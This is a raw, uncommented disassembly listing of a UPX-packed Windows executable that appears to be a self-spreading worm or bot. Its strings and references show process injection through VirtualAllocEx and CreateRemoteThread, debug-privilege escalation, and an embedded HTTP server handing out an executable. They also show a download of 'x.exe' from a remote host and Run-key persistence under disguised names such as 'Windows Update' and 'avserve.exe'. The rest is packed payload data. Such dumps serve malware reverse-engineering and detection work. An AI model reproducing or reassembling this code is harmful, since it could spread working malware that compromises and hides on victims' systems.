loc_30904CEA: ; CODE XREF: UPX0:30904CE2�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_30904CF4 dd 1CEC8166h dword_30904CF8 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_30901D20+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_30901D20+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_30901D20+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_30901D20+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_30901D20+8�o
; sub_3090236A+11A�o
align 10h
aUterm16 db 'uterm16',0 ; DATA XREF: sub_30901DA8:loc_30901E8D�o
; UPX0:30902309�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_30901DA8+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_30901DA8:loc_30901DEF�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_30901DA8+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_30901DA8+18�o
align 4
dword_30904DA8 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_30902036+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_30902036+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_30902036+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_30902036+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:309022F4�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_3090236A+121�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3090236A+113�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_3090236A+10C�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3090236A+FF�o
align 4
aU16 db 'u16',0 ; DATA XREF: sub_3090236A+ED�o
aU15 db 'u15',0 ; DATA XREF: sub_3090236A+E1�o
aU14 db 'u14',0 ; DATA XREF: sub_3090236A+D5�o
aU13i db 'u13i',0 ; DATA XREF: sub_3090236A+C9�o
align 10h
aU13 db 'u13',0 ; DATA XREF: sub_3090236A+BD�o
aU12 db 'u12',0 ; DATA XREF: sub_3090236A+B1�o
aU11 db 'u11',0 ; DATA XREF: sub_3090236A+A5�o
aU10 db 'u10',0 ; DATA XREF: sub_3090236A+99�o
aU9 db 'u9',0 ; DATA XREF: sub_3090236A+8D�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_3090236A+81�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_3090236A+75�o
align 10h
aU14x db 'u14x',0 ; DATA XREF: sub_3090236A+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_3090236A+5D�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_3090236A+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_3090236A+45�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_3090236A+3B�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_3090236A+22�o
align 10h
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_309026B8+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_3090217C+23�o
; sub_3090298C+5F�o ...
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_3090217C+1C�o
; sub_30902A3A+87�o ...
align 4
aElvrryfvsrhtjx db 'elvrryfvsrhtjxye',0 ; DATA XREF: sub_309015C7+4F�o
; sub_30902B06+57�o ...
align 4
dd 0
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_30902B06+32�o
aClient db 'Client',0 ; DATA XREF: sub_30902B06+BC�o
; sub_30902B06+F8�o
align 10h
aId db 'ID',0 ; DATA XREF: sub_30902B06+37�o
; sub_30902B06+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_3090298C+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_3090298C+47�o
align 10h
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_3090298C+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_3090298C+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_3090298C+32�o
align 10h
aSystray db 'SysTray',0 ; DATA XREF: sub_3090298C+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_3090298C+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_3090298C+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_3090298C+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_3090298C+F�o
align 4
a1: ; DATA XREF: sub_30902B06+B7�o
unicode 0, <1>,0
dd 6 dup(0)
dword_30905018 dd 0 ; sub_3090217C+80�w
dword_3090501C dd 0 ; sub_30902036:loc_30902125�o ...
dword_30905020 dd 0 ; sub_30902036:loc_309020E4�r ...
dword_30905024 dd 68h ; UPX0:30902314�w ...
dword_30905028 dd 0 ; sub_3090236A+33�w
dword_3090502C dd 0 ; sub_309026B8+20�r
dword_30905030 dd 30900000h ; UPX0:309022F9�w
dword_30905034 dd 0 ; sub_30902569+37�o ...
dword_30905038 dd 0 ; UPX0:30902767�w
word_3090503C dw 0 ; DATA XREF: sub_30902505+3B�r
; sub_30902569:loc_309025CA�r ...
align 10h
dword_30905040 dd 0 ; sub_30902B06+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 30906000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30906000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:30907B51�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 74736C01h
dd 79706372h, 100416Eh, 43746547h, 65727275h, 7250746Eh
dd 7365636Fh, 47010073h, 72507465h, 6441636Fh, 73657264h
dd 4C010073h, 4C64616Fh, 61726269h, 417972h, 69725701h
dd 72506574h, 7365636Fh, 6D654D73h, 79726Fh, 65704F01h
dd 6F72506Eh, 73736563h, 65470100h, 646F4D74h, 48656C75h
dd 6C646E61h, 1004165h, 54746547h, 436B6369h, 746E756Fh
dd 72430100h, 65746165h, 6574754Dh, 1004178h, 61657243h
dd 68546574h, 64616572h, 72430100h, 65746165h, 636F7250h
dd 41737365h, 65530100h, 65764574h, 100746Eh, 6E65704Fh
dd 6E657645h, 1004174h, 74697845h, 65726854h, 1006461h
dd 65746E49h, 636F6C72h, 4964656Bh, 6572636Eh, 746E656Dh
dd 65520100h, 69466461h, 100656Ch, 46746547h, 53656C69h
dd 657A69h, 69784501h, 6F725074h, 73736563h, 65470100h
dd 73614C74h, 72724574h, 726Fh, 0D1h, 0
dd 67655201h, 61657243h, 654B6574h, 41784579h, 65520100h
dd 74655367h, 756C6156h, 41784565h, 65520100h, 65755167h
dd 61567972h, 4565756Ch, 1004178h, 4F676552h, 4B6E6570h
dd 78457965h, 52010041h, 65446765h, 6574656Ch, 756C6156h
dd 1004165h, 43676552h, 65736F6Ch, 79654Bh, 6F624101h
dd 79537472h, 6D657473h, 74756853h, 6E776F64h, 43010041h
dd 74707972h, 61657243h, 61486574h, 1006873h, 70797243h
dd 73614874h, 74614468h, 43010061h, 74707972h, 69726556h
dd 69537966h, 74616E67h, 41657275h, 72430100h, 44747079h
dd 72747365h, 6148796Fh, 1006873h, 70797243h, 73654474h
dd 796F7274h, 79654Bh, 79724301h, 65527470h, 7361656Ch
dd 6E6F4365h, 74786574h, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 70797243h, 706D4974h
dd 4B74726Fh, 7965h, 0DEh, 0E8h, 61727301h, 100646Eh, 636D656Dh
dd 1007970h, 6C727473h, 1006E65h, 736D656Dh, 1007465h
dd 646E6172h, 655F0100h, 70656378h, 61685F74h, 656C646Eh
dd 1003372h, 73727473h, 1007274h, 63727473h, 7268h, 0E9h
dd 10Ch, 6E694601h, 6E695764h, 41776F64h, 65470100h, 726F4674h
dd 6F726765h, 57646E75h, 6F646E69h, 47010077h, 69577465h
dd 776F646Eh, 65726854h, 72506461h, 7365636Fh, 644973h
dd 70737701h, 746E6972h, 4166h, 0F4h, 120h, 746E4901h
dd 656E7265h, 65704F74h, 6C72556Eh, 49010041h, 7265746Eh
dd 4F74656Eh, 416E6570h, 6E490100h, 6E726574h, 6C437465h
dd 4865736Fh, 6C646E61h, 49010065h, 7265746Eh, 4774656Eh
dd 6F437465h, 63656E6Eh, 53646574h, 65746174h, 6E490100h
dd 6E726574h, 65527465h, 69466461h, 656Ch, 100h, 138h
dd 0FF0073FFh, 0DFF0002h, 1FF00h, 0FF0039FFh, 34FF006Fh
dd 17FF00h, 0FF000CFFh, 4FF0009h, 13FF00h, 0FF0010FFh
dd 3FF0016h, 0
dd 45500000h, 14C0000h, 0E4170002h, 40D3h, 0
dd 0E00000h, 10B010Fh, 24000006h, 12000000h, 0
dd 22EC0000h, 10000000h, 40000000h, 0
db 90h
db 30h, 0, 10h
dd 2000000h, 40000h, 0
dd 40000h, 0
dd 60000000h, 4000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 2CD40000h, 8C0000h, 14h dup(0)
dd 10000000h, 1780000h, 6 dup(0)
dd 742E0000h, 747865h, 23DC0000h, 10000000h, 24000000h
dd 4000000h, 3 dup(0)
dd 200000h, 642EE004h, 617461h, 10440000h, 40000000h, 10000000h
dd 28000000h, 3 dup(0)
dd 400000h, 5000C000h, 2ED80000h, 54AE0000h, 4A190000h
dd 7B021C02h, 33D8A046h, 0CD750216h, 7D0334ADh, 6801A73Dh
dd 0B9B3769Fh, 90E6D90Dh, 0B7CC3A4Ah, 0EDCD1B5Ah, 84E03721h
dd 2A706A76h, 38FC96F4h, 602039B2h, 640A5EC8h, 0CF86C997h
dd 847AC9h, 703FA228h, 6ED9B24Bh, 0B26C3C76h, 0E29810FCh
dd 0A723BDE8h, 0FDC0167h, 0F907E50h, 70E3616Fh, 0C00DAC68h
dd 0E33BD328h, 8C9C6C4h, 7A04E527h, 7364308Ah, 4C68DB0Ch
dd 36425FC5h, 1CD62D44h, 42402EDBh, 0DE9A497Eh, 0DE4441E0h
dd 5B6138C8h, 504440BCh, 0B7AC1BDEh, 1E106B19h, 970D94B7h
dd 0FF75B321h, 0ACF9819Dh, 0A580E87Ch, 6001624h, 0F92D8325h
dd 1C5268F4h, 12761C9Dh, 0C4CEF4F4h, 0EF1D9692h, 7C6A4C0Ah
dd 0E1B258F1h, 497C7BC8h, 0F24C8EBEh, 547BC9E1h, 0E92490E1h
dd 0EC976E66h, 2449FC9Fh, 48EDCF78h, 61B20296h, 150CF882h
dd 11998CF4h, 7A026616h, 4770086Ch, 5ED42E87h, 845FF42Ch
dd 0DA781F09h, 54541CC4h, 7FA4204Dh, 0A0F0A035h, 0F8057C2Bh
dd 375712B5h, 361597F2h, 145A7457h, 4B74F80Eh, 6E8E1068h
dd 86826251h, 0DBE53D74h, 8112D2CFh, 0FF9C4120h, 0E80FFC55h
dd 0B3DB07Bh, 0AC50E4B9h, 0B60E424Ch, 0F0757E9Ah, 0F8550702h
dd 0E48C0009h, 60762760h, 0CF47558h, 0B50E2587h, 0D8B18F6h
dd 0E7612C3Dh, 0FF7785EDh, 573C418Bh, 9C68C103h, 34488B66h
dd 4D899B8Bh, 0A4EAA0F4h, 0D8B092FBh, 53918C68h, 950ACBF0h
dd 8A01AD6Ah, 706312C7h, 74ECE1ACh, 0D7680DEDh, 0E82110Ch
dd 6C9A9D1Bh, 0A9DB1009h, 645D8B4Dh, 5051F8E1h, 68971418h
dd 683A412Ah, 5DAC1B14h, 0BA03CAF8h, 6B58D12Ah, 57B3D434h
dd 0E6ED831Dh, 0F05559ABh, 74CF7C7Dh, 376CC245h, 51F03EBAh
dd 315350E9h, 0EE13C1A8h, 0D6245FD9h, 0DA6A17FAh, 0D0E27FD4h
dd 3BEC5577h, 100574C7h, 0E1731BEBh, 4D77B631h, 59DD0E68h
dd 3505FC0Eh, 0EB6E7343h, 0EF740807h, 0BB860949h, 51174878h
dd 0F60E751h, 12C86931h, 0D144685h, 0AEBB425h, 0AFDD836Dh
dd 0E8B213B1h, 44CEBA0Fh, 0C22D59ACh, 0B8B66AF9h, 67B712C4h
dd 500C803Ch, 585250A8h, 507D9DD3h, 195DBC2Ch, 0E91167F1h
dd 57437C20h, 14247C8Bh, 6A37160Ch, 177EC998h, 0D5931A84h
dd 0C280FFFFh, 1E148861h, 7CF73B46h, 3B2480E9h, 19544400h
dd 43575B6Fh, 5A5F2E44h, 0DB5657ACh, 0D4C06074h, 732F8766h
dd 0B6225BDCh, 1950F0BBh, 0AA005650h, 0F0E77ACh, 0C09584D0h
dd 3249F405h, 683DADBAh, 0FFF00CFAh, 5B2708C7h, 34346DA6h
dd 482E2ACCh, 66B5CE75h, 4C0A0AB6h, 181A20BCh, 84F85805h
dd 0B807C650h, 2C013B7Fh, 0F6B7C73Bh, 8B0C40h, 8D510801h
dd 215F2444h, 84D3112Ch, 3D3166Dh, 43072459h, 7FAB4277h
dd 0C42007BBh, 9E3FDB2Fh, 0C8E433A1h, 10E7C1F8h, 0CD860B85h
dd 6E3233h, 125D8B02h, 0A3807238h, 7AC1AB33h, 756480Ch
dd 9BC6537Ch, 0F6ABD9F0h, 8451E11h, 4E1C6825h, 0E01D6D3Bh
dd 0ADE70055h, 0CCD917B5h, 42603C80h, 0C6643595h, 989D028Ch
dd 44B7073Dh, 0EC66C581h, 0FE475020h, 17A54DC4h, 14B370B3h
dd 377C54DAh, 4EEBF0h, 0B933A134h, 0C72B7900h, 0AEDDBD3Bh
dd 272C1FBh, 2BE1C18Bh, 1818A129h, 9623C703h, 0ACCA5BF8h
dd 72233D84h, 0F8786A11h, 8CF0A352h, 13C4EB3Dh, 3D93A2E1h
dd 1119A9DBh, 15941ED0h, 0C9BB9358h, 30BAC68h, 5997A868h
dd 3CB36D67h, 5354533Ah, 0A311F852h, 24CC838Fh, 0B604C298h
dd 0DB24668Fh, 0AFF45730h, 0A9DAD0B1h, 68C0090Fh, 0E3A64EF4h
dd 0E86EF76Dh, 80686806h, 27841D89h, 0EDEC2418h, 14B44BA9h
dd 0F2D4C0h, 937B5349h, 26D9826h, 80A33A01h, 5A8D1CD6h
dd 1A4DFA77h, 46CF0E74h, 0D8CD2F69h, 4BC20CA3h, 0A31DACEFh
dd 53FCA4FEh, 3A5B5651h, 3A86635Bh, 265668D4h, 119B87DFh
dd 54195EF9h, 424C10C2h, 5E051B4Dh, 0C4B56C0h, 0D2F49DFDh
dd 0EC5D89E8h, 25FF050Dh, 1BFD1FFFh, 3A04BEECh, 432CA3C3h
dd 8A1FE774h, 74C984CCh, 0ABE350DFh, 0EA6B0937h, 0A53C1742h
dd 30B74C85h, 400C6465h, 35F47F7Bh, 14F85F7Dh, 9E441FD8h
dd 38203668h, 0F752397Bh, 0E2EB060Fh, 595FCF53h, 45509730h
dd 70019043h, 875EEB36h, 0B03338AEh, 0E63E11D6h, 2D0F4C1h
dd 803AD6E6h, 6C6608B0h, 542068C3h, 74E030A3h, 763367Ch
dd 24A37BACh, 0B73DE01Ah, 182767BBh, 29DC4552h, 19041C0Dh
dd 0D9C13088h, 68021B37h, 0A413236Ah, 3ED7ABCBh, 1386EBD1h
dd 0CE699966h, 58D58304h, 40397044h, 9C812B11h, 9AD08847h
dd 43AE566Dh, 6C389C97h, 0B16B95A3h, 0FC1543F5h, 320318E8h
dd 2E4FF60h, 982404C7h, 2088900Bh, 80203203h, 79A40678h
dd 0DD0E7432h, 6406C70h, 64684064h, 64064064h, 3D545860h
dd 50064064h, 0C939594Ch, 750BF07Ch, 44683974h, 25A4994Eh
dd 0B6326277h, 34064E3Ch, 85D80D5Bh, 882C4984h, 27BC120Ah
dd 1B5D9DB9h, 0EC15217Ch, 14169C0Ah, 8B83C727h, 527C3020h
dd 67D21E4Dh, 0E6571461h, 8A138818h, 2824E3EBh, 153F093Ch
dd 0B63B9D00h, 43247031h, 7FA48051h, 11F0AADh, 458A519Bh
dd 0EE588D0Bh, 0FFEC38FAh, 3A52DB32h, 3135EC7Eh, 23FB5D38h
dd 2527B7C4h, 780B5D88h, 0B70FB507h, 19A43C35h, 908067F0h
dd 3FEF799h, 0B65D79D6h, 0C3FEFF8Ch, 72FFFB80h, 62A85EBDh
dd 30276476h, 5DF25FA9h, 0AD876833h, 4F58C870h, 220A8108h
dd 736B3618h, 7D0B095Dh, 13692575h, 0F756EECh, 1A25059Fh
dd 0B3B5BC83h, 84323D89h, 43D703FFh, 0D6A1B7C9h, 8411FB81h
dd 5D875F9Fh, 8D62CD74h, 48737B6Ch, 0E7812DA2h, 0EE2FD4CAh
dd 0B7CF16F3h, 0FF04FD73h, 7F3CE4FEh, 8D8B6C88h, 0AD6BF75Fh
dd 0E13B918Bh, 764EAADCh, 0A33E3B16h, 2F9E57A0h, 44B3DB57h
dd 0F8C49CC0h, 0C4691359h, 0FF21C4ADh, 0EE75B3A9h, 0A8586B23h
dd 0A62728E0h, 7060BED3h, 9ED3B0F0h, 0A91B7084h, 2584C4CBh
dd 0B0064E3Eh, 58C062DAh, 0BAC7508Fh, 0E0F99E68h, 283AE0F5h
dd 3720B2Ch, 0B003DF06h, 294EB068h, 0C0771110h, 2A15DDEAh
dd 0C6F76C43h, 0C2C00B80h, 27DFD726h, 9356558Ch, 0BC066357h
dd 0E63472B3h, 30E25101h, 0CA5C343h, 76F4FD1Fh, 506C4837h
dd 0F64F5314h, 506A020Bh, 2DFED38h, 1A5D38CDh, 96D205h
dd 98091874h, 117A1C6Bh, 190510EFh, 384EEC28h, 0D84F0014h
dd 0AAB41606h, 9F840ED8h, 530D74ABh, 1051C7D5h, 0B1080F0Dh
dd 244C39FFh, 6DED3A18h, 85F43593h, 93117EEDh, 144D2CF1h
dd 76C192EFh, 0A2059687h, 750DF2EBh, 5B8B0768h, 0E8DDEB65h
dd 8C1B3F68h, 9B8160Ch, 7D150C84h, 97162367h, 1408106Eh
dd 8706E8Eh, 1817511Dh, 6361EA56h, 182542CBh, 3D563EF6h
dd 718C4338h, 0E72ADC74h, 0DD2CB261h, 2050C116h, 0F1081810h
dd 3702D8Bh, 550F5E98h, 5D6BC68Bh, 0E7CF6621h, 532C562Eh
dd 3B264062h, 27005556h, 116B3964h, 0C520A13h, 498B3C04h
dd 9D5D0C0Eh, 278A0128h, 0DE53830Eh, 0DBC54E0Fh, 8E0FDC4Fh
dd 1E3C2294h, 794E365Ch, 0F8875BF7h, 0C8C7F2E0h, 837AA41Bh
dd 68BC5B25h, 0E2D84835h, 0D98AC5E8h, 6C20E110h, 7513DDF0h
dd 477DC21Ch, 11E748Dh, 83FDFC69h, 0EE56F159h, 0B5FF1C0Ch
dd 5E4173E0h, 0FF3345EAh, 8521F0Fh, 6666C386h, 0BC465060h
dd 6740E176h, 0B789BDAEh
dd 0B90F4F38h, 0D07B6295h, 0E003C757h, 0CCD40686h, 1C8E4723h
dd 0A8DCB4D8h, 72E4A0E0h, 9491C8E4h, 70EC7CE8h, 269A54F0h
dd 44F43983h, 0BF0A7DB0h, 2F9C4C2Ch, 65E0BE4Bh, 742C8A34h
dd 0C824188Bh, 7B3D829Bh, 17755959h, 1DEF170Eh, 0FA6A9935h
dd 8337D01Ah, 2675B68Ah, 7F122918h, 0D1517881h, 74C2311Fh
dd 4074AD09h, 4636A88h, 7D662ECEh, 1BA184A3h, 0FF05E9E5h
dd 8303E083h, 523E05C0h, 0C35C8427h, 10C89C45h, 22CEF7F9h
dd 0D6A63D37h, 1ECC0E26h, 3814330Eh, 346150E1h, 891677A1h
dd 66282040h, 2625BE65h, 676D7DC6h, 0C02CD983h, 87541441h
dd 0F4D092E9h, 0DC079F01h, 4B158B84h, 0C5B63EA0h, 9F60C436h
dd 14C7481Fh, 0D8402540h, 52E00BFDh, 1D6AE09Ah, 4F1CBF50h
dd 0AC4F404Ch, 5141081Eh, 1837743Fh, 1D030AFEh, 0A246BB0Ah
dd 6C5352D1h, 0F4C45730h, 3D53BCDFh, 59BF735Eh, 0FEBB138h
dd 0B232CE59h, 0B6D9D020h, 0FBE2BA68h, 65D81C6Eh, 0FC68BB26h
dd 0A0463884h, 0BB2D9B9Dh, 361A0DB9h, 6B050269h, 0EA125EB1h
dd 0EC6F09E7h, 0C6314C64h, 11FD3BBBh, 2C0CCB64h, 0B6240AEh
dd 48078B79h, 6015EB0Ch, 0D1880E53h, 380009CDh, 2BA1EAF8h
dd 44330C44h, 0B3D86837h, 6A763EC5h, 0CC401113h, 36464600h
dd 0FC25FFF7h, 0F0F4050Ch, 0BEA46AECh, 51001B67h, 7EC78D83h
dd 72DB17DFh, 0BE98114h, 185042Dh, 0BAEC7317h, 2BF6FAB7h
dd 0CC48BC8h, 88BE18Bh, 0C35004D2h, 0C6C2644Fh, 585C4646h
dd 80000049h, 0F102A045h, 5451E697h, 52240206h, 96EFFF53h
dd 803141E2h, 0F50101F0h, 7911838Dh, 0E42AEC52h, 0FFE7F63Ah
dd 49FFFFFFh, 0BEE0EA9Bh, 7EDB21AFh, 5E1A9544h, 85A03261h
dd 949F6A1Fh, 843994FFh, 358F26A6h, 0FF5C1DCEh, 0A5FE80FFh
dd 7AB20BC9h, 4DB37265h, 6C697A6Fh, 342F616Ch, 6F20302Eh
dd 28FFFFEDh, 706D6F63h, 62697461h, 203B656Ch, 4549534Dh
dd 9153620h, 2E6E6957h, 64FFF750h, 2073776Fh, 3520544Eh
dd 6F29312Eh, 4401EF54h, 0F9EECF3Eh, 0E243404h, 0F0001000h
dd 0D9A79E41h, 0D841E46Ch, 0ACB8C841h, 79EF9E66h, 700488A0h
dd 0E7BE4F5Ch, 4141CF3Bh, 4182813h, 0E28DFF10h, 47F80479h
dd 68746566h, 2E647261h, 0F6EDF6FEh, 7A6962h, 0C26B6308h
dd 766C2E73h, 7676638Fh, 1E75722Eh, 7DE5EDBh, 65777777h
dd 65AF6C64h, 76616B0Fh, 0DEEDBDBBh, 742E7A02h, 0E5660022h
dd 3D657365h, 0DA1A6863h, 0FDBFF93h, 646C6F67h, 61736E65h
dd 7566646Eh, 76DB0C4Fh, 633309F6h, 2E5D741Ah, 0EDBB6D0Fh
dd 3757231Dh, 706E0265h, 6C1735Fh, 6074ADD8h, 2F176F66h
dd 0F6B3DCD6h, 6A6F7274h, 73615758h, 0DB0C511Fh, 6D32BB61h
dd 27782D55h, 636F8363h, 72E562C9h, 0AF79622Dh, 0C2D8630Bh
dd 74056FD8h, 6E2E706Fh, 737F6917h, 56D80F27h, 786DA308h
dd 7564610Fh, 0F0B6B0F6h, 652D746Ch, 5B1769BBh, 2BA36F6Bh
dd 69EDDB7Ch, 2E744E73h, 694F6762h, 0ED0B32D7h, 780001F7h
dd 6A2C6177h, 556262h, 7FB3B6F8h, 66617A9Bh, 5D2EA861h
dd 0FF5C2365h, 1FC88785h, 5B636261h, 69686766h, 6D6C6B6Ah
dd 0B76FE37Fh, 7271C56Eh, 777675F7h, 0C47A7978h, 44434241h
dd 0FED14645h, 4847FFE5h, 4C4B4A49h, 504F4E4Dh, 56555451h
dd 5A595857h, 0FF60771Bh, 74689387h, 2F3A7074h, 0B73252Fh
dd 6DF6652Fh, 2E9737E1h, 3F706870h, 260F3D0Eh, 66E6373h
dd 0E19F6FB6h, 68B2664h, 313D3B76h, 74132636h, 0E560EC1Eh
dd 58EB101Bh, 3732313Dh, 0D77F7D91h, 3A3101A8h, 2F303038h
dd 0DFDF65h, 0B01FFFFBh, 335DDFE8h, 0EEB966C9h, 5758D01h
dd 68AFE8Bh, 1207993Ch, 466DFFFDh, 46302C06h, 7889934h
dd 0EBEDE247h, 4FDAE80Ah, 8DFEFFDBh, 2E676587h, 0C9999371h
dd 0BDFD1201h, 716FD91h, 0FDFEEBC1h, 0AA6872FFh, 0AA66FD42h
dd 14BA10FDh, 1A98A91Ch, 0F198F3C9h, 7F028608h, 71763FF6h
dd 5F9010C0h, 599237CBh, 3A781C96h, 7157E414h, 0F27DB77Dh
dd 713A0A61h, 0F19DF345h, 7F098904h, 0F1DF73A4h, 40119C04h
dd 0E3F367B3h, 0FE1C10F0h, 0DCB1DDBDh, 6059B20Bh, 125C99Bh
dd 0A10414D9h, 0C7B1F2C8h, 9E71CA17h, 61688D2Bh, 7DADAD91h
dd 0E21AC2F6h, 28111D96h, 0C850B2h, 0B3FDBB99h, 57DC14EDh
dd 4E122555h, 1291C0A4h, 0F7ED9949h, 0FD9FBB54h, 0C41400DBh
dd 71CBCA3Ah, 24FF1C3Bh, 0CF1A21E4h, 0F66D93CDh, 668FCDB0h
dd 1E3F812Ch, 0FF76CDF3h, 83B8B0FBh, 5D12CDC3h, 1DCBC9A8h
dd 0EC99AD25h, 0B24B64Fh, 96A6485Ah, 7E1B14C0h, 4C3FD976h
dd 0F3EBA729h, 16E9BA9Ch, 7126F434h, 0FB3FFEEEh, 0F90EFCF5h
dd 29EF133Bh, 5F376B46h, 0EC4766DEh, 0FDECAFA8h, 116CDFFh
dd 0EDFFC5B7h, 0FDE9ECE9h, 2CE1FCB7h, 0F77FB701h, 0FCF5CA21h
dd 0FCF25AFCh, 0F5FCF7EBh, 0C7D6ABAAh, 0FCBFEC34h, 59AAF9FFh
dd 2A2A25B4h, 93ACC966h, 90B78190h, 0C983639Dh, 309271CDh
dd 0FE17DD84h, 513519BFh, 0A95D914h, 712A9172h, 0FF68EBC8h
dd 0A5D21FFFh, 0E180D512h, 6FAA529Ah, 9A2A8D14h, 8B12B9C8h
dd 0FF474A9Ah, 0C3DFDBFFh, 0DB9BAB9Eh, 0EC20A319h, 0BDDDA26Ch
dd 0DF9EED85h, 0EB81E8A2h, 0C8125544h, 0B7FFF9A1h, 2E961FBDh
dd 0D812EB8Dh, 125A9A85h, 5A9A099Dh, 6D96F810h, 0D0613FF7h
dd 7F664922h, 8712FEFDh, 95C25AA9h, 0DB680C02h, 821285EDh
dd 0CB5A9104h, 39EFCFF7h, 85FF3721h, 424D53FFh, 0C8531872h
dd 0FFFCFEFFh, 62FE97h, 83435002h, 4F575445h, 50204B52h
dd 52474F52h, 31204D41h, 6B7DAC52h, 414C17CDh, 0A024D4Eh
dd 0DA56EBABh, 0B772BF1Ah, 0AA676B03h, 76D2DD6Eh, 330E7075h
dd 4D27611Ah, 4C583223h, 2196C3E5h, 2E323232h, 679D631h
dd 2018DA6Bh, 0A48B323Ch, 2B50BB73h, 0CF20719h, 635423FFh
dd 4007D83h, 20140A11h, 0D11FD405h, 6971BB5Bh, 534B4C00h
dd 97275053h, 0E0923DBEh, 0BAE00882h, 6E240057h, 8B006400h
dd 5F05EE6Dh, 3A730077h, 9013074h, 0DBD912DBh, 3500398Ch
dd 72E1D23h, 980D9139h, 8ABDA00h, 6499220h, 9F57DAE4h
dd 712760D8h, 46620003h, 0DC074723h, 403203C8h, 10060006h
dd 0FA297F01h, 8A151FFFh, 48E088h, 6E44004Fh, 0F27A6A19h
dd 226F49E4h, 281CFFB0h, 742530AFh, 0E1536710h, 96D7DF5Ch
dd 307590A7h, 75C0400h, 0D7BAEEBDh, 5C085A35h, 72E4D61h
dd 0B1380036h, 2E46C6EDh, 491B3077h, 0CF43EC00h, 58736761h
dd 64633F00h, 1F2DBFA2h, 4DC0820h, 0FF1640h, 4200DEDEh
dd 0EE41EC2h, 19F1600h, 0B8402602h, 286137EFh, 8B110319h
dd 3597D96Ch, 0D37468D8h, 9C2A9B70h, 7C85355Dh, 5050256Bh
dd 3B03BA48h, 541B7351h, 0B9F75413h, 265AEBADh, 5C225963h
dd 6545CBC7h, 3FE6907Bh, 0B000587h, 0B8481003h, 0FD0EB810h
dd 0BD8BFFFh, 19286A05h, 0D0B10C39h, 0A89B11h, 2ED94FC0h
